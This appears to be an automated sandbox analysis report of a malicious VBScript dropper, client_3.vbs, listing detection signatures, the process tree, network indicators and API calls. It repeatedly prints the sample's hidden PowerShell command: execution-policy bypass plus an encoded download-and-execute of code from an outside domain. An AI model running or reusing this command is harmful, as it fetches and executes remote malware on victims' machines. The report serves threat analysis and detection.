Edit tour

Windows Analysis Report
client_3.vbs

Overview

General Information

Sample Name:	client_3.vbs
Analysis ID:	1320445
MD5:	3dd859f7aa6f95b80aae2c7c4b5eaaf9
SHA1:	3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
SHA256:	8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
Tags:	agenziaentratealternativestagevbs
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

VBScript performs obfuscated calls to suspicious functions

Antivirus detection for URL or domain

Yara detected Powershell download and execute

PowerShell case anomaly found

Wscript starts Powershell (via cmd or directly)

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Suspicious powershell command line found

Contains functionality to modify clipboard data

Powershell drops PE file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to read the clipboard data

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6616 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\client_3.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6664 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6720 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

OgUpjXaY.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe" MD5: 47E88C8E89C1E99CA76EC3D8BAB8C3D8)

cleanup

Yara Signatures

Other

Source	Rule	Description	Author	Strings
amsi64_6720.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49684 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C89C60 GetProcAddress,FindFirstFileA,CloseHandle,		4_2_00C89C60
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C68D50 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,		4_2_00C68D50

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov edi, edx	4_2_00CA9090
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then add edi, 01h	4_2_00C57150
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then cmp dword ptr [ecx], eax	4_2_00C70100
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then cmp dword ptr [ecx], eax	4_2_00C70100
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov eax, dword ptr [edi+ebp*4+04h]	4_2_00C63130
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov ecx, edx	4_2_00C7B280
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then cmp byte ptr [edi+ebx], 0000002Ch	4_2_00C8D200
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov ecx, dword ptr [eax-08h]	4_2_00C65230
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov ecx, dword ptr [esp+eax*8]	4_2_00CCD4E0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then push ebx	4_2_00C73470
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	4_2_00C7F550
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then movzx ebp, byte ptr [edi]	4_2_00CAA6D0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then push ecx	4_2_00C78670
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then push dword ptr [edi+10h]	4_2_00CA3790
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov byte ptr [eax+esi*4+07h], 00000004h	4_2_00C448D7
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov esi, 00000000h	4_2_00CAF850
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov edi, dword ptr [ecx+18h]	4_2_00C4F9B0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov esi, 00000000h	4_2_00CAF970
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then push 00000001h	4_2_00C8CA90
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then sub edx, 01h	4_2_00C5AA50
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov eax, dword ptr [00D41768h]	4_2_00C45B50
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+01h]	4_2_00C7CB00
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov ecx, esi	4_2_00C4FCD0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then movzx eax, cl	4_2_00C7DC40
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4x nop then mov eax, dword ptr [edi+ebx*4+04h]	4_2_00C61F80

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1Host: the.earth.li
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: communicalink.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: powershell.exe, 00000003.00000002.944407584.0000015650BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.000001565092A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://communicalink.com
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://communicalink.com/index.php
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: OgUpjXaY.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: OgUpjXaY.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: OgUpjXaY.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: OgUpjXaY.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.944407584.0000015650C6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.earth.li
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.944407584.000001565021D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li
Source: powershell.exe, 00000003.00000002.944407584.0000015650C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li(
Source: powershell.exe, 00000003.00000002.944407584.0000015650BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeX
Source: OgUpjXaY.exe, OgUpjXaY.exe, 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000000.901523116.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000003.902845541.0000000003941000.00000004.00000020.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown

DNS traffic detected: queries for: communicalink.com

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C77210 recv,

4_2_00C77210

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1Host: the.earth.li
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: communicalink.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49684 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C46150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,		4_2_00C46150
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C47490 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,		4_2_00C47490

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C49D30 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,

4_2_00C49D30

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C41130 RealizePalette,UpdateColors,RealizePalette,UpdateColors,GetKeyboardState,ScreenToClient,GetKeyboardState,DefWindowProcW,

4_2_00C41130

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C46150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,

4_2_00C46150

System Summary

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C52080	4_2_00C52080
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C60090	4_2_00C60090
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C4D000	4_2_00C4D000
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CAB180	4_2_00CAB180
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CE6140	4_2_00CE6140
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C41130	4_2_00C41130
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C5E280	4_2_00C5E280
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C7B280	4_2_00C7B280
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C56260	4_2_00C56260
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CDF3F0	4_2_00CDF3F0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CDB3F0	4_2_00CDB3F0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CAE360	4_2_00CAE360
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CD4330	4_2_00CD4330
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C47490	4_2_00C47490
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CA8490	4_2_00CA8490
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CE3417	4_2_00CE3417
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C52080	4_2_00C52080
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C7A520	4_2_00C7A520
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CDC530	4_2_00CDC530
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CAD6C0	4_2_00CAD6C0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CAA6D0	4_2_00CAA6D0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CE2644	4_2_00CE2644
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C607F0	4_2_00C607F0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CCD770	4_2_00CCD770
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CA98F0	4_2_00CA98F0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C48920	4_2_00C48920
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CE6A9B	4_2_00CE6A9B
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C5AA50	4_2_00C5AA50
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CA3CF0	4_2_00CA3CF0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C49D80	4_2_00C49D80
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C4FDB0	4_2_00C4FDB0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C59D50	4_2_00C59D50
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C69D00	4_2_00C69D00
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C41E56	4_2_00C41E56
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C61F80	4_2_00C61F80

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C88760 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C7EA00 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C651E0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00CA88E0 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C78880 appears 109 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C78E30 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C73B40 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00CEDB03 appears 386 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C88CA0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C73A70 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00CA7220 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C888B0 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00C895A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00CDEDF0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: String function: 00CA7210 appears 40 times

Source: client_3.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\client_3.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe"
